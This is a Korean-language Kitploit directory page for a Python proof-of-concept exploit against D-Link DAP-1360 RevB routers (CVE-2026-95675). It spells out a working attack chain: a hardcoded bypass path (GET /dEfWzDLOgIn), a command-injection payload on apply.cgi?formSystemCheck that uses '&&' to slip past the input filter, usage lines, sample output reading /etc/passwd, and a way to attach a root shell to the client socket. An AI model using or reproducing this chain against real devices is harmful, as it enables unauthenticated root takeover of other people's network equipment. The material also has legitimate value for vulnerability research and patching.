Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/d6fault/cve-2026-95675
Embedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationReverse EngineeringWeb Application ExploitationHardware & IoT SecurityRemote Access ToolFirmware Analysis
GitHubd6fault/cve-2026-95675

CVE-2026-95675

1210시간 4분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Python PoC로, D-Link DAP-1360 RevB 펌웨어의 하드코딩된 인증 우회와 formSystemCheck 핸들러를 통해 인증 없이 루트 명령 주입이 가능한 CVE-2026-95675를 익스플로잇합니다.

저장소 보기

CVE-2026-95675 — D-Link DAP-1360 RevB

formSystemCheck 핸들러에서 하드코딩된 인증 백도어를 통해 도달 가능한 인증되지 않은 원격 루트 명령 실행(CWE-78 — OS 명령 주입). DAP-1360 RevB, 펌웨어 2.14B05에서 검증됨.

근본 원인

두 가지 독립적인 문제가 연쇄됨:

1. 하드코딩된 인증 우회 경로. main (httpd @ 0x4064c8)에서:

root@kitploit:~
strcasecmp(request_path, "dEfWzDLOgIn")   ; token @ 0x48046c
  ...
  sw 1, 8(sp_login_slot)                  ; mark this source-IP as logged in

GET /dEfWzDLOgIn은 404를 반환하지만(실제 파일이 아님), 부작용으로 요청한 소스 IP의 세션 슬롯을 인증된 것으로 표시함 — 사용자 이름, 비밀번호, 캡차가 필요하지 않음.

2. OS 명령 주입. formSystemCheck (POST /apply.cgi?formSystemCheck)는 다음과 같이 셸 명령을 구성함:

root@kitploit:~
_system("ping %s -c 2 >/tmp/test_ping", cgi("ipv4_ping"))

ipv4_ping은 정제 없이 포맷 문자열에 전달됨; _system()은 vsprintf를 사용하여 고정 스택 버퍼에 넣고 system()에 전달함. 핸들러 자체는 인증 검사를 수행하지 않음.

파서 주의사항

busybox POST-body 파서는 ;, |, 백틱, 개행을 제거하지만 &&는 살아남음. 페이로드는 접두사 ping을 종료한 다음 &&로 연결해야 함, 예:

root@kitploit:~
127.0.0.1 -c 1 && <command> > /www/out.htm && x

사용법

root@kitploit:~
python3 autopoc.py <target> [command]

python3 autopoc.py 192.168.0.50
python3 autopoc.py 192.168.0.50 "ls -la /"
ArgDescription
target대상 호스트/IP (기본 스킴 http://)
command (선택 사항)실행할 루트 명령 (기본값: cat /etc/passwd); ;/`

작동 방식

  1. GET /dEfWzDLOgIn — 하드코딩된 인증 우회를 트리거함 (404 반환; 부작용은 서버 측에서 발생).
  2. POST /apply.cgi?formSystemCheck에 ipv4_ping=127.0.0.1 -c 1 && <cmd> > /www/<OUT> && x — 루트 명령 주입.
  3. GET /<OUT> — 명령 출력을 검색함 (httpd는 .txt가 아닌 .htm/.html을 제공함).

출력

root@kitploit:~
[*] target   : 192.168.0.50
[*] command  : cat /etc/passwd
[*] GET /dEfWzDLOgIn -> 404 (login slot flagged)
[*] POST /apply.cgi?formSystemCheck -> 302
[+] output (RCE.htm):
------------------------------------------------------------
root:x:0:0:root:/:/dev/null
nobody:x:0:0:nobody:/:/dev/null
------------------------------------------------------------

참고 / 제한 사항

  • 장치 busybox에는 nc, wget, base64, chmod, id가 없음 — cat, echo, ls, cp 등을 사용하세요.
  • 출력은 전 세계 쓰기 가능한 docroot에 기록되고 HTTP를 통해 가져옴 (리스너 불필요).
  • 대화형 셸의 경우, 주입된 프로세스는 클라이언트 소켓을 fd 5로 상속함; httpd가 _system()이 반환될 때까지 응답을 지연하는 것과 결합하여 sh <&5 >&5 2>&5가 라이브 연결에 셸을 연결할 수 있음 (user-mode QEMU에서는 취약함; 실제 하드웨어에서는 더 나음).
  • DAP-1360 RevC1 / 펌웨어 3.00 또는 "D-Link Russia" DIR/xDSL 빌드에는 적용되지 않음 — 다른 엔드포인트, docroot 및 파서. 별도 분석이 필요함.

노출

Shodan("CAMEO-httpd", httpd 벤더 배너)은 이 정확한 코드베이스의 인터넷 노출 인스턴스가 소수만 있음을 보여줌; 이 장치는 주로 LAN 측 액세스 포인트임. 익스플로잇은 웹 관리 인터페이스에 대한 도달 가능성이 필요함.

도구 다운로드